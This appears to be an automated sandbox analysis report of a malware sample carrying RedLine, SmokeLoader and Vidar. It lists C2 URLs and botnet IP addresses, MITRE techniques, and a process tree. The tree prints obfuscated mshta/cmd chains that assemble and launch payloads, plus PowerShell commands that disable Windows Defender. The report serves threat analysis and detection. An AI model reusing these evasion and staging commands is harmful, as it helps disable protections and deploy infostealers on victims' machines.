redline | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

Target

acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Size

3.5MB
MD5

a75539ada819b941531f116f3d50b13b
SHA1

942d264f3b0cc866c84114a06be4fa7aeb905b3c
SHA256

acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0
SHA512

ee89498995cc1a9a91c754c391082f7e38fa22fee413033b6cb9318a0008baa7e8bfcf2a1c3aebc3fa1c0cbace33c27b8979953868b01dc296c9e01e0c8e3b49

Score

10^/10

redline smokeloader vidar 937 chris fucker2 media20 aspackv2 backdoor evasion infostealer spyware stealer suricata trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

Chris

194.104.136.5:46013

Extracted

Family

redline

Botnet

fucker2

135.181.129.119:4805

Extracted

Family

redline

Botnet

media20

91.121.67.60:2151

Extracted

Family

vidar

Version

47.9

Botnet

937

https://mas.to/@kirpich

Attributes

profile_id
937

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4300	4176	rundll32.exe	114

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

resource	yara_rule
behavioral12/memory/2240-302-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral12/memory/3692-311-0x000000000041B23E-mapping.dmp	family_redline
behavioral12/memory/1008-310-0x000000000041B23E-mapping.dmp	family_redline
behavioral12/memory/2240-306-0x000000000041B242-mapping.dmp	family_redline
behavioral12/memory/1008-305-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral12/memory/3692-304-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral12/memory/1008-365-0x0000000005540000-0x0000000005B46000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral12/memory/60-454-0x0000000000400000-0x00000000004D9000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral12/files/0x000600000001abdd-126.dat	aspack_v212_v242
behavioral12/files/0x000400000001abdf-130.dat	aspack_v212_v242
behavioral12/files/0x000400000001abdf-131.dat	aspack_v212_v242
behavioral12/files/0x000600000001abdd-127.dat	aspack_v212_v242
behavioral12/files/0x000500000001abc0-128.dat	aspack_v212_v242
behavioral12/files/0x000500000001abc0-133.dat	aspack_v212_v242
behavioral12/files/0x000500000001abc0-132.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 17 IoCs

pid	Process
1140	setup_installer.exe
1856	setup_install.exe
3880	Wed09ed6b36e57df5f.exe
3756	Wed0900caa0501dc98f.exe
1372	Wed090db89ca4c58.exe
1724	Wed0944361c3621a67a6.exe
4068	Wed09c4c0c3d01.exe
2836	Wed09d761ab4704dd931.exe
60	Wed0983917533e.exe
2288	Wed09fbe3bf81.exe
860	Wed09755e77ed017e8af.exe
2428	Wed09f69eef9c0d5b.exe
1976	Wed0968d19e5ec37794.exe
2128	Wed091bab77a3bb62d.exe
1440	dwuOSRZcyv1Qz3vrC7nMfiUf.exe
3080	Wed09f69eef9c0d5b.exe
3236	Wed09f69eef9c0d5b.tmp

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 9 IoCs

pid	Process
1856	setup_install.exe
1856	setup_install.exe
1856	setup_install.exe
1856	setup_install.exe
1856	setup_install.exe
1856	setup_install.exe
1856	setup_install.exe
1856	setup_install.exe
1440	dwuOSRZcyv1Qz3vrC7nMfiUf.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
320	ipinfo.io
13	ip-api.com
34	ipinfo.io
35	ipinfo.io
36	ipinfo.io
218	ipinfo.io
221	ipinfo.io
319	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
1852	1856	WerFault.exe	70
3228	4768	WerFault.exe	137
5528	4936	WerFault.exe
2560	4456	WerFault.exe	140
5336	5680	WerFault.exe	159

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Ju68ZBo5gJh99AZ4tDyB9Qee.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Ju68ZBo5gJh99AZ4tDyB9Qee.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Ju68ZBo5gJh99AZ4tDyB9Qee.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
6232	schtasks.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
8100	taskkill.exe
7788	taskkill.exe
4884	taskkill.exe
7056	taskkill.exe
7544	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
60	Ju68ZBo5gJh99AZ4tDyB9Qee.exe
60	Ju68ZBo5gJh99AZ4tDyB9Qee.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
2128	Wed091bab77a3bb62d.exe
3756	Wed0900caa0501dc98f.exe
3756	Wed0900caa0501dc98f.exe
3756	Wed0900caa0501dc98f.exe
3756	Wed0900caa0501dc98f.exe
3756	Wed0900caa0501dc98f.exe
3756	Wed0900caa0501dc98f.exe
3756	Wed0900caa0501dc98f.exe
3756	Wed0900caa0501dc98f.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	Wed09d761ab4704dd931.exe
Token: SeRestorePrivilege	1852	WerFault.exe
Token: SeBackupPrivilege	1852	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1356 wrote to memory of 1140	1356	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	69
PID 1356 wrote to memory of 1140	1356	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	69
PID 1356 wrote to memory of 1140	1356	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	69
PID 1140 wrote to memory of 1856	1140	setup_installer.exe	70
PID 1140 wrote to memory of 1856	1140	setup_installer.exe	70
PID 1140 wrote to memory of 1856	1140	setup_installer.exe	70
PID 1856 wrote to memory of 376	1856	setup_install.exe	73
PID 1856 wrote to memory of 376	1856	setup_install.exe	73
PID 1856 wrote to memory of 376	1856	setup_install.exe	73
PID 1856 wrote to memory of 916	1856	setup_install.exe	74
PID 1856 wrote to memory of 916	1856	setup_install.exe	74
PID 1856 wrote to memory of 916	1856	setup_install.exe	74
PID 1856 wrote to memory of 1776	1856	setup_install.exe	75
PID 1856 wrote to memory of 1776	1856	setup_install.exe	75
PID 1856 wrote to memory of 1776	1856	setup_install.exe	75
PID 1856 wrote to memory of 1224	1856	setup_install.exe	103
PID 1856 wrote to memory of 1224	1856	setup_install.exe	103
PID 1856 wrote to memory of 1224	1856	setup_install.exe	103
PID 1856 wrote to memory of 3504	1856	setup_install.exe	102
PID 1856 wrote to memory of 3504	1856	setup_install.exe	102
PID 1856 wrote to memory of 3504	1856	setup_install.exe	102
PID 916 wrote to memory of 1532	916	cmd.exe	101
PID 916 wrote to memory of 1532	916	cmd.exe	101
PID 916 wrote to memory of 1532	916	cmd.exe	101
PID 376 wrote to memory of 696	376	cmd.exe	76
PID 376 wrote to memory of 696	376	cmd.exe	76
PID 376 wrote to memory of 696	376	cmd.exe	76
PID 1856 wrote to memory of 420	1856	setup_install.exe	100
PID 1856 wrote to memory of 420	1856	setup_install.exe	100
PID 1856 wrote to memory of 420	1856	setup_install.exe	100
PID 1856 wrote to memory of 2148	1856	setup_install.exe	77
PID 1856 wrote to memory of 2148	1856	setup_install.exe	77
PID 1856 wrote to memory of 2148	1856	setup_install.exe	77
PID 1856 wrote to memory of 3488	1856	setup_install.exe	78
PID 1856 wrote to memory of 3488	1856	setup_install.exe	78
PID 1856 wrote to memory of 3488	1856	setup_install.exe	78
PID 1776 wrote to memory of 3880	1776	cmd.exe	99
PID 1776 wrote to memory of 3880	1776	cmd.exe	99
PID 1776 wrote to memory of 3880	1776	cmd.exe	99
PID 3504 wrote to memory of 3756	3504	cmd.exe	98
PID 3504 wrote to memory of 3756	3504	cmd.exe	98
PID 3504 wrote to memory of 3756	3504	cmd.exe	98
PID 1856 wrote to memory of 3168	1856	setup_install.exe	97
PID 1856 wrote to memory of 3168	1856	setup_install.exe	97
PID 1856 wrote to memory of 3168	1856	setup_install.exe	97
PID 420 wrote to memory of 1372	420	cmd.exe	79
PID 420 wrote to memory of 1372	420	cmd.exe	79
PID 420 wrote to memory of 1372	420	cmd.exe	79
PID 1856 wrote to memory of 1804	1856	setup_install.exe	96
PID 1856 wrote to memory of 1804	1856	setup_install.exe	96
PID 1856 wrote to memory of 1804	1856	setup_install.exe	96
PID 1856 wrote to memory of 1744	1856	setup_install.exe	94
PID 1856 wrote to memory of 1744	1856	setup_install.exe	94
PID 1856 wrote to memory of 1744	1856	setup_install.exe	94
PID 1224 wrote to memory of 1724	1224	cmd.exe	95
PID 1224 wrote to memory of 1724	1224	cmd.exe	95
PID 1856 wrote to memory of 1972	1856	setup_install.exe	93
PID 1856 wrote to memory of 1972	1856	setup_install.exe	93
PID 1856 wrote to memory of 1972	1856	setup_install.exe	93
PID 2148 wrote to memory of 4068	2148	cmd.exe	92
PID 2148 wrote to memory of 4068	2148	cmd.exe	92
PID 2148 wrote to memory of 4068	2148	cmd.exe	92
PID 1856 wrote to memory of 2320	1856	setup_install.exe	80
PID 1856 wrote to memory of 2320	1856	setup_install.exe	80

C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
"C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1356
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Users\Admin\AppData\Local\Temp\7zS47476126\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS47476126\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        
        PID:696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1776
    - - C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09ed6b36e57df5f.exe
        
        Wed09ed6b36e57df5f.exe
        5⤵
        Executes dropped EXE
        
        PID:3880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2148
    - - C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09c4c0c3d01.exe
        
        Wed09c4c0c3d01.exe
        5⤵
        Executes dropped EXE
        
        PID:4068
      - C:\Users\Admin\AppData\Roaming\4856710.exe
        
        "C:\Users\Admin\AppData\Roaming\4856710.exe"
        6⤵
        
        PID:4320
      - C:\Users\Admin\AppData\Roaming\8935068.exe
        
        "C:\Users\Admin\AppData\Roaming\8935068.exe"
        6⤵
        
        PID:4592
      - C:\Users\Admin\AppData\Roaming\3132884.exe
        
        "C:\Users\Admin\AppData\Roaming\3132884.exe"
        6⤵
        
        PID:3644
      - C:\Users\Admin\AppData\Roaming\5940429.exe
        
        "C:\Users\Admin\AppData\Roaming\5940429.exe"
        6⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\5940429.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\5940429.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        7⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\5940429.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\5940429.exe" ) do taskkill -f -Im "%~NXZ"
        8⤵
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
        
        ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
        9⤵
        
        PID:6348
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        10⤵
        
        PID:5384
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
        11⤵
        
        PID:6948
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
        10⤵
        
        PID:8076
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
        11⤵
        
        PID:7372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        12⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
        12⤵
        
        PID:7696
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "5940429.exe"
        9⤵
        Kills process with taskkill
        
        PID:7056
      - C:\Users\Admin\AppData\Roaming\6538346.exe
        
        "C:\Users\Admin\AppData\Roaming\6538346.exe"
        6⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:5224
      - C:\Users\Admin\AppData\Roaming\6352289.exe
        
        "C:\Users\Admin\AppData\Roaming\6352289.exe"
        6⤵
        
        PID:1900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0983917533e.exe
      4⤵
      PID:3488
    - - C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed0983917533e.exe
        
        Wed0983917533e.exe
        5⤵
        Executes dropped EXE
        
        PID:60
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe
      4⤵
      PID:2320
    - - C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09755e77ed017e8af.exe
        
        Wed09755e77ed017e8af.exe
        5⤵
        Executes dropped EXE
        
        PID:860
      - C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09755e77ed017e8af.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09755e77ed017e8af.exe
        6⤵
        
        PID:1008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe
      4⤵
      PID:3292
    - - C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed091bab77a3bb62d.exe
        
        Wed091bab77a3bb62d.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2128
      - C:\Users\Admin\Pictures\Adobe Films\aJLZr7A50WMjhXnmedj5S7_R.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aJLZr7A50WMjhXnmedj5S7_R.exe"
        6⤵
        
        PID:1080
      - C:\Users\Admin\Pictures\Adobe Films\Ju68ZBo5gJh99AZ4tDyB9Qee.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Ju68ZBo5gJh99AZ4tDyB9Qee.exe"
        6⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        
        PID:60
      - C:\Users\Admin\Pictures\Adobe Films\4Qlho2wcOR1TPTpcfhXjOdVo.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\4Qlho2wcOR1TPTpcfhXjOdVo.exe"
        6⤵
        
        PID:5096
      - C:\Users\Admin\Pictures\Adobe Films\fGqJM5rPXocl6AKPXOF0hqnn.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\fGqJM5rPXocl6AKPXOF0hqnn.exe"
        6⤵
        
        PID:5080
      - C:\Users\Admin\Pictures\Adobe Films\Kxht0cL5u2MCpCS4vcVxg2G3.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Kxht0cL5u2MCpCS4vcVxg2G3.exe"
        6⤵
        
        PID:4532
      - C:\Users\Admin\Pictures\Adobe Films\5b7uXbkvoGHyd_V26O4WrpCm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5b7uXbkvoGHyd_V26O4WrpCm.exe"
        6⤵
        
        PID:4468
        
        C:\Users\Admin\Pictures\Adobe Films\5b7uXbkvoGHyd_V26O4WrpCm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5b7uXbkvoGHyd_V26O4WrpCm.exe"
        7⤵
        
        PID:5112
      - C:\Users\Admin\Pictures\Adobe Films\SKWu22DBO6OKGwUIvZcvX3J2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\SKWu22DBO6OKGwUIvZcvX3J2.exe"
        6⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "SKWu22DBO6OKGwUIvZcvX3J2.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\SKWu22DBO6OKGwUIvZcvX3J2.exe" & exit
        7⤵
        
        PID:6520
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "SKWu22DBO6OKGwUIvZcvX3J2.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:7788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe
      4⤵
      PID:1744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe
      4⤵
      PID:3168
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 584
      4⤵
      Program crash
      Suspicious use of AdjustPrivilegeToken
      PID:1852

C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed090db89ca4c58.exe
Wed090db89ca4c58.exe
1⤵
- Executes dropped EXE
PID:1372
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"
    3⤵
    PID:692
  - - C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
      ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
      4⤵
      PID:4224
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
        5⤵
        
        PID:4380
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
        6⤵
        
        PID:4624
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
        5⤵
        
        PID:5024
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
        6⤵
        
        PID:4128
        
